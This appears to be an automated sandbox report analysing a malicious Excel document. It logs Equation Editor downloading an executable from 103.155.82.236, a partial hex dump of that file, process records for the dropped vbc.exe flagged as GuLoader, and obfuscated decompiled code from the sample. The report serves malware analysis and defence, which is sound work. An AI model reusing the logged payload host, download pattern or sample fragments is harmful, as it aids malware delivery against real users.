Jun 14, 2021 08:54:15.654594898 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654613018 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654629946 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654645920 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654663086 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654679060 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654692888 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.654695988 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654714108 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654733896 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654747963 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654759884 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654767036 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.654772997 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654789925 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654799938 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.654807091 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654824018 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654833078 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.654843092 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654860973 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654864073 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.654879093 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654891968 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.654896975 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654915094 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654922962 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.654927969 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654939890 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654957056 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654957056 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.654974937 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654989958 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.655020952 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.657318115 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.657444954 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.658984900 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.659091949 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659127951 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659147024 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659163952 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659181118 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659190893 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.659198999 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659219980 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659221888 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.659239054 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659260035 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.659279108 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659296989 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659297943 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.659302950 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659315109 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.659352064 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.659382105 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.676482916 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.903934956 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.903963089 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.903975964 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.903992891 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.904011011 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.904027939 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.904050112 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.904062986 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.904074907 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.904088974 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.904170036 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.904211998 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.907960892 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.907990932 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.908004999 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.908016920 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.908035994 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.908047915 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.908057928 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.908102989 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.908163071 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.908327103 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:16.450469971 CEST	49167	80	192.168.2.22	103.155.82.236

HTTP Request Dependency Graph

103.155.82.236

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	103.155.82.236	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 14, 2021 08:54:14.406260014 CEST	0	OUT	GET /nrsdoc/svchost.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 103.155.82.236 Connection: Keep-Alive
Jun 14, 2021 08:54:14.656141043 CEST	2	IN	HTTP/1.1 200 OK Date: Mon, 14 Jun 2021 06:54:23 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Sun, 13 Jun 2021 20:01:48 GMT ETag: "24000-5c4ab36086dc4" Accept-Ranges: bytes Content-Length: 147456 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 40 bb 60 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 10 02 00 00 30 00 00 00 00 00 00 a4 18 00 00 00 10 00 00 00 20 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 05 58 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 17 02 00 28 00 00 00 00 40 02 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 0e 02 00 00 10 00 00 00 10 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 20 02 00 00 10 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 09 00 00 00 40 02 00 00 10 00 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPEL@`R0 @PX(@0( .text `.datax @.rsrc0@0@@IMSVBVM60.DLL
Jun 14, 2021 08:54:14.656167984 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jun 14, 2021 08:54:14.656182051 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jun 14, 2021 08:54:14.656198025 CEST	6	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jun 14, 2021 08:54:14.905258894 CEST	7	IN	Data Raw: 41 00 5c a7 41 00 b5 a7 41 00 b5 a7 41 00 c0 a8 41 00 c7 a8 41 00 38 aa 41 00 38 aa 41 00 62 ab 41 00 69 ab 41 00 8a ab 41 00 8a ab 41 00 00 00 00 00 00 00 00 00 00 00 f0 bf 06 00 04 00 00 00 00 00 bc af 41 00 88 af 41 00 06 00 04 00 00 00 00 00 Data Ascii: A\AAAAA8A8AbAiAAAAA~A@AmALAAAcA}AjAAA]A0AQA ABAAA(AA=AYAEA
Jun 14, 2021 08:54:14.905323029 CEST	9	IN	Data Raw: 00 00 03 03 09 00 00 00 43 6f 63 6b 65 72 65 64 00 08 41 00 f0 07 41 00 00 00 00 00 ff cc 31 00 0f 3e 8f c6 f9 3a f1 5c 4f a4 58 c0 fe 0c 8f 50 ae 76 71 c8 eb 92 e4 7c 4f aa 89 0a 39 97 27 10 0f 3a 4f ad 33 99 66 cf 11 b7 0c 00 aa 00 60 d3 93 00 Data Ascii: CockeredAA1>:\OXPvq\|O9':O3f`GadriaterhavetdysensB"$dysens58?&DF,Text1Historicising,
Jun 14, 2021 08:54:14.905342102 CEST	10	IN	Data Raw: 00 00 49 2d 3e be cd e2 d7 4d 82 18 e6 a1 37 1e 32 79 52 36 4f 65 29 df 56 43 b2 b4 d4 61 53 aa c4 88 00 00 00 00 76 17 57 30 00 00 00 00 00 00 0b 00 00 00 05 00 00 00 00 00 00 00 d2 00 00 00 d2 00 01 00 00 00 02 00 00 00 a6 fd ff ff a5 fd ff ff Data Ascii: I->M72yR6Oe)VCaSvW0EP??Fh?TextBack
Jun 14, 2021 08:54:14.905359030 CEST	11	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 22 40 00 d8 21 40 00 8c 18 40 00 92 18 40 00 98 18 Data Ascii: "@!@@@@"@!@@@@
Jun 14, 2021 08:54:14.905376911 CEST	13	IN	Data Raw: 40 00 f9 2e 40 00 06 2f 40 00 13 2f 40 00 2d 2f 40 00 3a 2f 40 00 47 2f 40 00 61 2f 40 00 7b 2f 40 00 88 2f 40 00 95 2f 40 00 a2 2f 40 00 bc 2f 40 00 c9 2f 40 00 f0 2f 40 00 24 30 40 00 31 30 40 00 3e 30 40 00 58 30 40 00 00 00 00 00 d4 25 40 00 Data Ascii: @.@/@/@-/@:/@G/@a/@{/@/@/@/@/@/@/@$0@10@>0@X0@%@8%@@@@%@8%@@@@
Jun 14, 2021 08:54:14.905392885 CEST	14	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 28 40 00 38 25 40 00 8c 18 40 00 92 18 40 00 98 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: (@8%@@@@l$;l$l$Al$l$wl$jl$-l$l$
Jun 14, 2021 08:54:14.905411005 CEST	15	IN	Data Raw: 74 00 61 00 74 00 38 00 00 00 30 00 00 00 70 00 68 00 6f 00 74 00 61 00 65 00 73 00 74 00 68 00 65 00 73 00 69 00 73 00 62 00 65 00 76 00 61 00 65 00 62 00 6e 00 69 00 6e 00 67 00 73 00 00 00 00 00 1a 4f ad 33 99 66 cf 11 b7 0c 00 aa 00 60 d3 93 Data Ascii: tat80photaesthesisbevaebningsO3f`(KREDITORERSBERNICEEN(Responsorialhymenialvq\|O9'NQJ'ee=>:\OXPH:~_IF\|

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2404 Parent PID: 584

General

Start time:	08:53:46
Start date:	14/06/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f2c0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2616 Parent PID: 584

General

Start time:	08:54:08
Start date:	14/06/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2760 Parent PID: 2616

General

Start time:	08:54:11
Start date:	14/06/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	147456 bytes
MD5 hash:	EE83942376EA5717149517FCC832AB9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 29%, Virustotal, Browse Detection: 9%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2760 Parent PID: 2616 vbc.exeCOMMON

Executed Functions

Function 003C6E50, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 456memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 003C70BA

Strings

}4zW, xrefs: 003C6EBF

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: }4zW
API String ID: 2167126740-3148660538
Opcode ID: 8b6865f5a4bdd1131aac44ecb228f7fc6711e7812e7e595f8c18f166373ff90d
Instruction ID: 9b56e4921d321c555d6a14f4c80c82e95b9deda7f506e48b7b9adcdbb5864032
Opcode Fuzzy Hash: 8b6865f5a4bdd1131aac44ecb228f7fc6711e7812e7e595f8c18f166373ff90d
Instruction Fuzzy Hash: 8BD1EE321186989FDB239F24C885BE9BBA1FF9A310F15415DDC81CF651EB319E46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 004018A4, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 416
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			_entry_(signed int __eax, signed int __ebx, intOrPtr* __ecx, void* __edx, intOrPtr* __edi, void* __esi, void* __fp0, char _a1, void* _a36, void* _a64, void* _a83, void* _a781254720, intOrPtr _a1191182338, intOrPtr _a1207959553, intOrPtr _a1959342778) {
				void* _v1;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v41;
				char _v46;
				void* _v53;
				void* _v57;
				void* _v73;
				void* _v77;
				void* _v81;
				void* _v97;
				void* _v113;
				void* _v129;
				void* _v136;
				void* _v145;
				void* _v161;
				void* _v169;
				void* _v177;
				void* _v181;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed char _t373;
				signed char _t375;
				signed char _t376;
				signed int _t377;
				signed char _t379;
				intOrPtr* _t380;
				signed int _t381;
				signed char _t382;
				signed int _t383;
				intOrPtr* _t385;
				signed int _t386;
				intOrPtr* _t387;
				intOrPtr* _t388;
				intOrPtr* _t390;
				intOrPtr _t391;
				intOrPtr* _t630;
				intOrPtr* _t631;
				signed int _t634;
				signed int _t636;
				signed char _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				intOrPtr* _t645;
				signed char _t649;
				signed int _t651;
				void* _t652;
				signed char _t654;
				void* _t655;
				signed int _t657;
				signed int _t658;
				signed int _t660;
				signed char _t662;
				signed int _t664;
				intOrPtr* _t666;
				intOrPtr* _t667;
				void* _t686;
				signed int* _t688;
				intOrPtr* _t689;
				void* _t690;
				void* _t692;
				intOrPtr* _t710;
				signed char _t715;
				void* _t716;
				intOrPtr* _t736;
				intOrPtr _t737;
				void* _t741;
				signed int _t745;
				intOrPtr* _t746;
				void* _t757;
				signed int _t760;
				signed int _t762;
				void* _t776;
				signed int _t777;
				void* _t778;
				void* _t791;
				intOrPtr* _t795;
				signed int _t799;
				void* _t801;
				signed char _t803;
				signed int _t806;
				intOrPtr _t813;
				signed int _t825;
				intOrPtr _t830;

				_t734 = __edi;
				_t665 = __ebx;
				_push("VB5!6&*"); // executed
				L0040189E(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t369 = 1 + __eax;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *((intOrPtr*)(_t776 +  &_v46)) =  *((intOrPtr*)(_t776 +  &_v46)) + __ecx;
				asm("adc esi, [ss:ebx-0x49]");
				_t715 = __edx + 1;
				asm("outsd");
				_t745 = __esi +  *((intOrPtr*)(__ebx + 0x978fbd));
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *__ecx =  *__ecx + _t369;
				 *_t369 =  *_t369 + _t369;
				 *__ebx =  *__ebx + _t369;
				_t688 = __ecx +  *__ecx;
				 *_t369 =  *_t369 + _t369;
				_t8 = __ebx + 0x6f;
				 *_t8 =  *((intOrPtr*)(__ebx + 0x6f)) + _t369;
				asm("arpl [ebx+0x65], bp");
				if( *_t8 < 0) {
					L5:
					_a1191182338 = _a1191182338 + _t715;
					 *_t369 =  *_t369 + _t369;
					 *_t369 =  *_t369 + _t369;
					_t370 = _t369 | 0x72646100;
					_t777 = _t688[0x1d] * 0x61687265;
					_t799 = _t777;
					goto L6;
				} else {
					 *[fs:eax] = _t688 +  *[fs:eax];
					_t664 = _t369 + _t715;
					_pop(es);
					_t688 =  &(_t688[0]);
					 *_t664 =  *_t664 + _t664;
					 *_t664 =  *_t664 + _t664;
					_t665 = __ebx + __ebx;
					asm("int3");
					 *_t664 =  *_t664 ^ _t664;
					asm("invalid");
					_pop(_t745);
					asm("stc");
					_pop(_t777);
					_t734 = __edi - 1;
					_t795 = _t734;
					asm("movsb");
					_pop(_t657);
					_t715 = _t715 >> 0xc;
					asm("invalid");
					asm("scasb");
					if(_t795 <= 0) {
						if(_t801 >= 0) {
							L23:
							 *_t665 =  *_t665 + 1;
							_t658 = _t657 ^  *_t657;
							 *_t658 =  *_t658 + _t658;
							_t371 = _t658 +  *_t745;
							 *((intOrPtr*)(_t665 + 0x68)) =  *((intOrPtr*)(_t665 + 0x68)) + _t371;
							asm("arpl [gs:ebx+0x32], bp");
							 *0x45001301 =  *0x45001301 + _t371;
							_t665 = _t665 - 1;
							_push(_t665);
							_push(_t371);
							_push(_t715);
							_push(_t777);
							_push(_t715);
							_push(_t715);
							_push(_t777);
							_t688 = _t688 - 1;
							_t745 = 1 + _t745;
							_t734 = _t734 + 1;
							_t760 =  &_a1;
							_push(_t715);
							 *0x5ef02d8 =  *0x5ef02d8 + _t371;
							goto L24;
						} else {
							asm("gs outsb");
							if (_t801 >= 0) goto L13;
							_t660 = _t657 ^ 0x00001538;
							asm("aas");
							_pop(ds);
							 *_t660 =  *_t660 + _t660;
							asm("aad 0x12");
							 *_t660 =  *_t660 + _t660;
							asm("adc eax, 0x440000");
							_t745 = 1 + _t745;
							_t665 = _t665 + _t665;
							 *((intOrPtr*)(_t660 + _t660)) =  *((intOrPtr*)(_t660 + _t660)) + _t760;
							 *_t660 =  *_t660 + _t660;
							 *0x78655400 =  *0x78655400 + _t660;
							if( *0x78655400 == 0) {
								L18:
								_t371 = _t660;
								_t806 = _t371;
								_push(_t715);
								asm("gs insb");
								asm("popad");
								if(_t806 == 0) {
									goto L29;
								} else {
									if(_t806 <= 0) {
										goto L30;
									} else {
										if(_t806 != 0) {
											if(_t806 != 0) {
												 *0x79a02fb =  *0x79a02fb + _t371;
												_t657 = _t371 + 0xa12066f;
												_t665 = _t665 + _t665;
												goto L23;
											}
											L24:
											asm("out dx, eax");
											_t652 = _t371 + 0x491047b;
										}
										goto L29;
									}
								}
							} else {
								 *_t715 =  *_t715 + _t660;
								_t760 = _t760 + _t745 +  *((intOrPtr*)(_t745 + 0xb02f602));
								_t654 = _t660 + 0x00000083 | 0x73694800;
								_t803 = _t654;
								if(_t803 == 0) {
									L28:
									 *_t654 =  *_t654 ^ _t654;
									 *_t654 =  *_t654 + _t654;
									_t655 = _t654 + 6;
									 *((intOrPtr*)(_t665 + 0x6f)) =  *((intOrPtr*)(_t665 + 0x6f)) + _t655;
									asm("insd");
									asm("bound ebp, [edi+0x32]");
									 *_t734 =  *_t734 + _t655;
									_t371 = _t655 + 0x6bc0546;
									_t688 = _t688 +  *((intOrPtr*)(_t688 + _t715));
									_t33 = _t715 + 0x65;
									 *_t33 =  *((intOrPtr*)(_t715 + 0x65)) + _t371;
									_t813 =  *_t33;
									_push(0x6473766f);
									L29:
									if(_t813 < 0) {
										L30:
										_t760 =  *[gs:esi+0x69] * 0x6974;
										asm("outsd");
										asm("outsb");
										 *_t371 =  *_t371 ^ _t371;
										asm("adc ecx, [eax]");
										 *_t371 =  *_t371 + _t371;
										 *0x53480008 =  *0x53480008 + _t371;
										asm("arpl [edx+0x6f], si");
										asm("insb");
										asm("insb");
										 *_t371 =  *_t371 ^ _t371;
										 *_t715 =  *_t715 | _t371;
										_t649 = _t371 - 0x3607ef02 + 0x22;
										_pop(es);
										_t686 = _t665 + _t665 +  *_t745 + _t665 + _t665 +  *_t745 +  *_t745;
										 *_t649 =  *_t649 + _t649;
										 *_t745 =  *_t745 + _t649;
										 *_t649 =  *_t649 | _t649;
										_push(_t745);
										asm("arpl [edx+0x6f], si");
										asm("insb");
										asm("insb");
										 *_t649 =  *_t649 ^ _t649;
										asm("movsd");
										_t665 = _t686 + _t688;
										_t651 = (_t649 |  *_t715) +  *_t715;
										 *((intOrPtr*)(_t715 + 0x60907)) =  *((intOrPtr*)(_t715 + 0x60907)) + _t715;
										 *_t665 =  *_t665 + 1;
										ds = _t686;
										 *_t651 =  *_t651 + _t651;
										 *_t734 =  *_t734 + _t651;
										 *_t651 =  *_t651 | _t651;
										_push(_t745);
										_push(_t665);
										asm("arpl [edx+0x6f], si");
										asm("insb");
										asm("insb");
										_t715 = _t715 ^  *_t688;
										 *_t715 = _t688 +  *_t715;
										_t371 = _t651 +  *((intOrPtr*)(_t715 + 0x4022001));
									}
								} else {
									if(_t803 < 0) {
										 *_t654 =  *_t654 | _t654;
										_t665 = _t665 + _t665;
										_t745 = _t745 +  *_t688;
										goto L28;
									} else {
										asm("arpl [ecx+0x73], bp");
										_t760 =  *(_t745 + 0x67) * 0xc1200;
										 *_t665 =  *_t665 + 1;
										_t662 = _t654;
										 *_t662 =  *_t662 + _t662;
										 *_t715 =  *_t715 + _t662;
										_push(es);
										 *((intOrPtr*)(_t745 + 0x72)) =  *((intOrPtr*)(_t745 + 0x72)) + _t662;
										asm("popad");
										asm("insd");
										_t660 = (_t662 ^  *[gs:eax]) +  *_t688;
										goto L18;
									}
								}
							}
						}
					} else {
						asm("enter 0x92eb, 0xe4");
						if(_t795 >= 0) {
							asm("stosb");
							 *_t715 = _t688;
							_t734 = _t734 - 1;
							asm("lodsd");
